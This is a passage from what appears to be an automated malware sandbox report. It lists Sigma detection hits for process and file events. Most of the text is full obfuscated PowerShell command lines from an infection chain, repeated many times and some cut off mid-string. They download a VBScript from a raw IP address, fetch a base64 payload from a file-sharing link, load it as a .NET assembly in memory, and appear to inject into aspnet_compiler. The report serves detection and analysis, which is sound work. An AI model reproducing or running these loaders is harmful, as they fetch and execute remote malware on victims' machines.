CAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 7672, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline", ProcessId: 7580, ProcessName: csc.exe
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 7672, ProcessName: wscript.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", CommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTS
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, 